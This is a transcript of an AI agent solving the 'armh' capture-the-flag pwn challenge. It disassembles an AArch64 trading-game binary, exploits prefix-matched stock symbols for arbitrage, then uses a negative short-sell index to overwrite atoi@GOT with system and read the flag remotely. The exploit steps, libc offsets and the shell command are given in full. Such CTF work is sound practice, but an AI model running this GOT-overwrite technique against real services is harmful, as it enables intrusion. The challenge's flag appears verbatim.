@ 0x166c(r) │ │ 0x00000f68 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f6c 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000f70 01040011 add w1, w0, 1 │ │ 0x00000f74 a00000b0 adrp x0, 0x15000 │ │ 0x00000f78 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f7c 010000b9 str w1, [x0] ; 0x15a18 │ │ ; obj.num_stocks │ │ ; CODE XREF from sym.add_stock @ 0xe90(x) │ │ ; DATA XREF from sym.short_sell @ 0x168c(x) │ └──> 0x00000f80 800000d0 adrp x0, 0x12000 │ 0x00000f84 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000f88 e21740f9 ldr x2, [var_28h] │ 0x00000f8c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; 
reloc.__stack_chk_guard │ ; DATA XREF from sym.short_sell @ 0x16d0(r) │ 0x00000f90 420001eb subs x2, x2, x1 │ 0x00000f94 010080d2 mov x1, 0 │ ┌─< 0x00000f98 40000054 b.eq 0xfa0 │ │ 0x00000f9c 9dfeff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.add_stock @ 0xf98(x) │ └─> 0x00000fa0 fd7b43a9 ldp x29, x30, [var_30h] │ 0x00000fa4 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00000fa8 c0035fd6 ret ; CALL XREF from sym.buy_stock @ 0x126c(x) ; CALL XREF from sym.sell_stock @ 0x13ec(x) ┌ 228: sym.find_user_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x10..0x38]) │ 0x000010b4 ff0301d1 sub sp, sp, 0x40 │ 0x000010b8 fd7b02a9 stp x29, x30, [var_20h] │ 0x000010bc fd830091 add x29, sp, 0x20 │ 0x000010c0 f31b00f9 str x19, [var_30h] │ 0x000010c4 e00700f9 str x0, [s2] ; arg1 │ 0x000010c8 800000b0 adrp x0, 0x12000 │ 0x000010cc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000010d0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000010d4 e10f00f9 str x1, [var_18h] │ 0x000010d8 010080d2 mov x1, 0 │ 0x000010dc e00740f9 ldr x0, [s2] │ 0x000010e0 00004039 ldrb w0, [x0] │ 0x000010e4 1f000071 cmp w0, 0 │ ┌─< 0x000010e8 61000054 b.ne 0x10f4 │ │ 0x000010ec 00008012 mov w0, -1 │ ┌──< 0x000010f0 1c000014 b 0x1160 │ ││ ; CODE XREF from sym.find_user_stock @ 0x10e8(x) │ │└─> 0x000010f4 ff1700b9 str wzr, [var_14h] │ │┌─< 0x000010f8 13000014 b 0x1144 │ ││ ; CODE XREF from sym.find_user_stock @ 0x1158(x) │ ┌───> 0x000010fc e01780b9 ldrsw x0, [var_14h] │ ╎││ 0x00001100 01e47ad3 lsl x1, x0, 6 │ ╎││ 0x00001104 800000f0 adrp x0, 0x14000 │ ╎││ 0x00001108 00600491 add x0, x0, 0x118 ; 0x14118 │ ╎││ ; obj.user_stocks │ ╎││ 0x0000110c 3300008b add x19, x1, x0 ; 0x14118 │ ╎││ ; obj.user_stocks │ ╎││ 0x00001110 e00740f9 ldr x0, [s2] ; const char *s │ ╎││ 0x00001114 1ffeff97 bl sym.imp.strlen ; size_t strlen(const char *s) │ ╎││ 0x00001118 e20300aa mov x2, x0 ; size_t n │ ╎││ 0x0000111c e10740f9 ldr x1, [s2] 
; const void *s2 │ ╎││ 0x00001120 e00313aa mov x0, x19 ; const void *s1 │ ╎││ 0x00001124 4ffeff97 bl sym.imp.memcmp ; int memcmp(const void *s1, const void *s2, size_t n) │ ╎││ 0x00001128 1f000071 cmp w0, 0 │ ┌────< 0x0000112c 61000054 b.ne 0x1138 │ │╎││ 0x00001130 e01740b9 ldr w0, [var_14h] │ ┌─────< 0x00001134 0b000014 b 0x1160 │ ││╎││ ; CODE XREF from sym.find_user_stock @ 0x112c(x) │ │└────> 0x00001138 e01740b9 ldr w0, [var_14h] │ │ ╎││ 0x0000113c 00040011 add w0, w0, 1 │ │ ╎││ 0x00001140 e01700b9 str w0, [var_14h] │ │ ╎││ ; CODE XREF from sym.find_user_stock @ 0x10f8(x) │ │ ╎│└─> 0x00001144 e11740b9 ldr w1, [var_14h] │ │ ╎│ 0x00001148 a0000090 adrp x0, 0x15000 │ │ ╎│ 0x0000114c 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001150 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001154 3f00006b cmp w1, w0 │ │ └───< 0x00001158 23fdff54 b.lo 0x10fc │ │ │ 0x0000115c 00008012 mov w0, -1 │ │ │ ; CODE XREFS from sym.find_user_stock @ 0x10f0(x), 0x1134(x) │ └──└──> 0x00001160 e103002a mov w1, w0 │ 0x00001164 800000b0 adrp x0, 0x12000 │ 0x00001168 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000116c e30f40f9 ldr x3, [var_18h] │ 0x00001170 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001174 630002eb subs x3, x3, x2 │ 0x00001178 020080d2 mov x2, 0 │ ┌─< 0x0000117c 40000054 b.eq 0x1184 │ │ 0x00001180 24feff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.find_user_stock @ 0x117c(x) │ └─> 0x00001184 e003012a mov w0, w1 │ 0x00001188 f31b40f9 ldr x19, [var_30h] │ 0x0000118c fd7b42a9 ldp x29, x30, [var_20h] │ 0x00001190 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00001194 c0035fd6 ret ; CALL XREF from sym.add_stock @ 0xea8(x) ; CALL XREFS from sym.tick @ 0x1900(x), 0x1918(x) ┌ 132: sym.drand (int64_t arg_30h); │ `- args() vars(5:sp[0x8..0x30]) │ 0x00000dc0 ffc300d1 sub sp, sp, 0x30 │ 0x00000dc4 fd7b02a9 stp x29, x30, [var_20h] │ 
0x00000dc8 fd830091 add x29, sp, 0x20 │ 0x00000dcc e00700fd str d0, [var_8h] │ 0x00000dd0 e10300fd str d1, [sp] │ 0x00000dd4 800000d0 adrp x0, 0x12000 │ 0x00000dd8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ddc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000de0 e10f00f9 str x1, [var_18h] │ 0x00000de4 010080d2 mov x1, 0 │ 0x00000de8 06ffff97 bl sym.imp.rand ; int rand(void) │ 0x00000dec 0100621e scvtf d1, w0 │ 0x00000df0 e20340fd ldr d2, [sp] │ 0x00000df4 e00740fd ldr d0, [var_8h] │ 0x00000df8 4038601e fsub d0, d2, d0 │ 0x00000dfc 2008601e fmul d0, d1, d0 │ 0x00000e00 e0676ab2 mov x0, 0xffffffc00000 │ 0x00000e04 e03be8f2 movk x0, 0x41df, lsl 48 │ 0x00000e08 0100679e fmov d1, x0 │ 0x00000e0c 0118611e fdiv d1, d0, d1 │ 0x00000e10 e00740fd ldr d0, [var_8h] │ 0x00000e14 2028601e fadd d0, d1, d0 │ 0x00000e18 800000d0 adrp x0, 0x12000 │ 0x00000e1c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e20 e20f40f9 ldr x2, [var_18h] │ 0x00000e24 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e28 420001eb subs x2, x2, x1 │ 0x00000e2c 010080d2 mov x1, 0 │ ┌─< 0x00000e30 40000054 b.eq 0xe38 │ │ 0x00000e34 f7feff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.drand @ 0xe30(x) │ └─> 0x00000e38 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00000e3c ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x00000e40 c0035fd6 ret - **Assistant:** There are repeated variable mixups: entered quantities get overwritten by stock/user indices in buy/sell/short paths. The most promising one is `short_sell`, where the second input is later reused as a stock index, giving out-of-bounds access if we choose a large “quantity.” - **Assistant:** Current portfolio: Money: $10000.00 Shorting Capacity: $10.00 What would you like to do? 1. Buy stock. 2. Sell stock. 3. Check stock price. 4. Short sell stock. 5. Consult market. Enter your choice: Invalid choice. 
Final amount of money: 10000.00 - **Assistant:** I can interact with the service, and a normal 101-turn session just ends with `Final amount of money: 10000.00`, so the exploit has to drive money high or corrupt control/data. I’m checking whether we can run the AArch64 binary locally under qemu to iterate faster. - **Assistant:** Get:1 http://archive.ubuntu.com/ubuntu resolute InRelease [136 kB] Get:2 http://security.ubuntu.com/ubuntu resolute-security InRelease [136 kB] Get:3 http://security.ubuntu.com/ubuntu resolute-security/main amd64 Packages [34.7 kB] Get:4 http://security.ubuntu.com/ubuntu resolute-security/universe amd64 Packages [44.5 kB] Get:5 http://archive.ubuntu.com/ubuntu resolute-updates InRelease [136 kB] Get:6 http://archive.ubuntu.com/ubuntu resolute-backports InRelease [136 kB] Get:7 http://archive.ubuntu.com/ubuntu resolute/main amd64 Packages [1874 kB] Get:8 http://archive.ubuntu.com/ubuntu resolute/universe amd64 Packages [20.1 MB] Get:9 http://archive.ubuntu.com/ubuntu resolute/restricted amd64 Packages [189 kB] Get:10 http://archive.ubuntu.com/ubuntu resolute/multiverse amd64 Packages [352 kB] Get:11 http://archive.ubuntu.com/ubuntu resolute-updates/restricted amd64 Packages [34.7 kB] Get:12 http://archive.ubuntu.com/ubuntu resolute-updates/universe amd64 Packages [44.5 kB] Get:13 http://archive.ubuntu.com/ubuntu resolute-updates/main amd64 Packages [78.2 kB] Fetched 23.3 MB in 5s (4242 kB/s) Reading package lists... - **Assistant:** Building dependency tree... Reading state information... Solving dependencies... The following additional packages will be installed: qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt The following NEW packages will be installed: qemu-user qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt 0 upgraded, 4 newly installed, 0 to remove and 1 not upgraded. Need to get 14.8 MB of archives. After this operation, 137 MB of additional disk space will be used. 
Get:1 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-helper-virt-hwe all 1:10.2.1+ds-1ubuntu4 [45.0 kB] Get:2 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-virt amd64 1:10.2.1+ds-1ubuntu3 [40.4 kB] Get:3 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user amd64 1:10.2.1+ds-1ubuntu3 [14.7 MB] Get:4 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user-binfmt amd64 1:10.2.1+ds-1ubuntu3 [1678 B] Fetched 14.8 MB in 2s (8251 kB/s) Selecting previously unselected package ubuntu-helper-virt-hwe. (Reading database ... 73935 files and directories currently installed.) Preparing to unpack .../ubuntu-helper-virt-hwe_1%3a10.2.1+ds-1ubuntu4_all.deb ... Unpacking ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Selecting previously unselected package ubuntu-virt. Preparing to unpack .../ubuntu-virt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user. Preparing to unpack .../qemu-user_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user-binfmt. Preparing to unpack .../qemu-user-binfmt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ... Setting up ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Setting up ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Setting up qemu-user (1:10.2.1+ds-1ubuntu3) ... 
Setting up qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ...
Processing triggers for systemd (259.5-0ubuntu3) ...

- **Assistant:** Local qemu execution works now. I’m going to create a small scratch driver so I can automate candidate payloads and parse final money/crashes instead of doing manual `nc` sessions.

- **Assistant:**

  ```text
  - Market -
  0. AAPL: 5152 shares at $665.03
  1. GOOG: 3119 shares at $361.44
  2. TSLA: 3887 shares at $287.15
  3. ARMH: 10480 shares at $343.46
  4. NVDA: 4794 shares at $111.94
  5. MSFT: 10533 shares at $426.35
  6. ATVI: 8658 shares at $442.65
  7. CSCO: 6138 shares at $468.86
  8. AMD: 2039 shares at $560.09
  9. INTC: 4491 shares at $398.56
  -
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 494)
  ```

- **Assistant:** The trading logic alone can generate some money, but the OOB short path is still more interesting: its write lands on predictable global/GOT addresses for negative indices and on portfolio entries for indices above 99. I’m testing those cases locally now to see which ones pass the capacity check and what they corrupt.

- **Assistant:**

  ```text
  [x] Receiving all data
  [x] Receiving all data: 1B
  [x] Receiving all data: 49B
  [+] Receiving all data: Done (49B)
  [*] Process '/usr/bin/qemu-aarch64' stopped with exit code 0 (pid 565)
  Invalid choice.
  Final amount of money: 12889.92
  ```

- **Assistant:**

  ```text
  [x] Receiving all data
  [x] Receiving all data: 1B
  [x] Receiving all data: 49B
  [+] Receiving all data: Done (49B)
  [*] Process '/usr/bin/qemu-aarch64' stopped with exit code 0 (pid 569)
  Invalid choice.
  Final amount of money: 13622.41
  ```

- **Assistant:**

  ```text
  [x] Receiving all data
  [x] Receiving all data: 1B
  [x] Receiving all data: 364B
  [+] Receiving all data: Done (364B)
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 602)
  Transaction failed.
  Current portfolio:
  Money: $268.89
  A: 1 shares
  AA: 1 shares
  AAP: 1 shares
  AAPL: 1 shares
  G: 1 shares
  GO: 1 shares
  GOO: 1 shares
  GOOG: 1 shares
  T: 1 shares
  TS: 1 shares
  TSL: 1 shares
  Shorting Capacity: $0.27
  What would you like to do?
  1. Buy stock.
  2. Sell stock.
  3. Check stock price.
  4. Short sell stock.
  5. Consult market.
  Enter your choice:
  ```

- **Assistant:** The key trading bug is in symbol matching rather than quantity: `find_user_stock()` treats the sell input as a prefix. If we buy `AM`/`AT` (AMD/ATVI) without ever buying `A`, then selling symbol `A` sells those shares at AAPL’s price. That gives a repeatable price-arbitrage loop when AAPL is above AMD or ATVI.

- **Assistant:**

  ```text
  - Market -
  0. AAPL: 3489 shares at $4816.43
  1. GOOG: 7116 shares at $5756.87
  2. TSLA: 7299 shares at $6192.53
  3. ARMH: 4129 shares at $6380.58
  4. NVDA: 10248 shares at $6571.80
  5. MSFT: 5649 shares at $3099.82
  6. ATVI: 3686 shares at $5178.71
  7. CSCO: 4851 shares at $4566.45
  8. AMD: 2451 shares at $5739.64
  9. INTC: 5395 shares at $5957.58
  -
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 689)
  ```

- **Assistant:**

  ```text
  - Market -
  0. AAPL: 7318 shares at $5103.42
  1. GOOG: 6637 shares at $7784.51
  2. TSLA: 4950 shares at $5030.71
  3. ARMH: 3148 shares at $6981.81
  4. NVDA: 3355 shares at $3357.10
  5. MSFT: 7817 shares at $7318.92
  6. ATVI: 9720 shares at $7103.64
  7. CSCO: 10881 shares at $4586.97
  8. AMD: 10001 shares at $3852.66
  9. INTC: 4969 shares at $6274.04
  -
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 702)
  ```

- **Assistant:**

  ```text
  Current portfolio:
  Money: $173521.93
  Shorting Capacity: $173.52
  What would you like to do?
  1. Buy stock.
  2. Sell stock.
  3. Check stock price.
  4. Short sell stock.
  5. Consult market.
  Enter your choice:
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 744)
  ```

- **Assistant:**

  ```text
  [*] cycle 4: money=25617.46, buy=AM, qty=19, ref_price=1297.87
  [*] after cycle 4: money=38176.60
  [*] cycle 5: money=38176.60, buy=AM, qty=28, ref_price=1329.66
  [*] after cycle 5: money=38176.60
  [*] cycle 6: money=38176.60, buy=AM, qty=21, ref_price=1788.14
  [*] after cycle 6: money=54374.10
  [*] cycle 7: money=54374.10, buy=AM, qty=28, ref_price=1908.85
  [*] after cycle 7: money=88118.89
  [*] cycle 8: money=88118.89, buy=AM, qty=45, ref_price=1927.57
  [*] after cycle 8: money=88118.89
  [*] cycle 9: money=88118.89, buy=AM, qty=34, ref_price=2514.66
  [*] after cycle 9: money=88118.89
  [*] cycle 10: money=88118.89, buy=AM, qty=29, ref_price=3009.56
  [*] after cycle 10: money=88118.89
  [*] cycle 11: money=88118.89, buy=AM, qty=27, ref_price=3178.12
  [*] after cycle 11: money=108699.62
  [*] cycle 12: money=108699.62, buy=AM, qty=30, ref_price=3553.77
  [*] after cycle 12: money=131059.03
  [*] cycle 13: money=131059.03, buy=AM, qty=29, ref_price=4480.75
  [*] after cycle 13: money=122781.33
  [*] cycle 14: money=122781.33, buy=AM, qty=28, ref_price=4352.45
  [*] after cycle 14: money=119324.20
  [*] cycle 15: money=119324.20, buy=AM, qty=27, ref_price=4395.53
  [*] after cycle 15: money=120752.63
  [*] cycle 16: money=120752.63, buy=AM, qty=26, ref_price=4545.21
  [*] after cycle 16: money=134507.01
  [*] cycle 17: money=134507.01, buy=AM, qty=29, ref_price=4532.53
  [*] after cycle 17: money=155299.42
  [*] sent GOT adjustment short
  [*] sending command: echo PWNED
  PWNED
  Invalid choice.
  Current portfolio:
  Money: $155299.42
  Shorting Capacity: $155.30
  What would you like to do?
  1. Buy stock.
  2. Sell stock.
  3. Check stock price.
  4. Short sell stock.
  5. Consult market.
  Enter your choice:
  [*] Stopped process '/usr/bin/qemu-aarch64' (pid 815)
  ```

- **Assistant:** The full chain works locally: after compounding above $100k, shorting `-3` with quantity `-0xb5b4` adjusts the low dword of `atoi@GOT` to `system`, and the next menu input runs as a shell command. I’m running the same chain against the remote now; if the initial AAPL/AMD/ATVI spread is unfavorable I’ll reconnect.

- **Assistant:**

  ```text
  [x] Opening connection to armh.play.ctf.se on port 8888: Trying 13.60.76.107
  [+] Opening connection to armh.play.ctf.se on port 8888: Done
  [*] arb using AM/AMD, ratio=3.37, prices={'AAPL': 819.98, 'GOOG': 249.87, 'TSLA': 474.34, 'ARMH': 41.44, 'NVDA': 349.3, 'MSFT': 297.33, 'ATVI': 321.06, 'CSCO': 346.28, 'AMD': 243.47, 'INTC': 471.11}
  [*] cycle 0: money=10000.00, buy=AM, qty=39, ref_price=243.47
  [*] after cycle 0: money=44523.36
  [*] cycle 1: money=44523.36, buy=AM, qty=119, ref_price=363.94
  [*] after cycle 1: money=197644.26
  [*] sent GOT adjustment short
  [*] sending command: cat /flag* flag* 2>/dev/null
  midnight{Stock_trading_is_harder_than_pwning$$$}
  Invalid choice.
  Current portfolio:
  Money: $197644.26
  Shorting Capacity: $197.64
  What would you like to do?
  1. Buy stock.
  2. Sell stock.
  3. Check stock price.
  4. Short sell stock.
  5. Consult market.
  Enter your choice:
  [*] Closed connection to armh.play.ctf.se port 8888
  ```

- **Assistant:** Solved.

  Flag:

  ```text
  midnight{Stock_trading_is_harder_than_pwning$$$}
  ```

  Core exploit:

  1. `find_stock()` and `find_user_stock()` use `memcmp(..., strlen(input))`, so symbols are prefix-matched.
  2. Buy `AM` to buy AMD, then sell with symbol `A`.
     - `find_user_stock("A")` matches the held `AM` position.
     - `find_stock("A")` resolves to AAPL.
     - If AAPL > AMD, this compounds money quickly.
  3. Once money is over `$100000`, short selling is enabled.
  4. `short_sell()` allows a negative stock index. Using index `-3` targets `atoi@GOT`.
  5. The supplied libc has:
     - `atoi = 0x3baf0`
     - `system = 0x470a4`
     - delta = `0xb5b4`
  6. Shorting with quantity `-0xb5b4` changes `atoi@GOT` into `system`.
  7. The next menu input becomes a shell command:

  ```sh
  cat /flag* flag* 2>/dev/null
  ```

  I left the working exploit script at [solve_armh.py](/workspace/solve_armh.py).

- **System:** Thread completed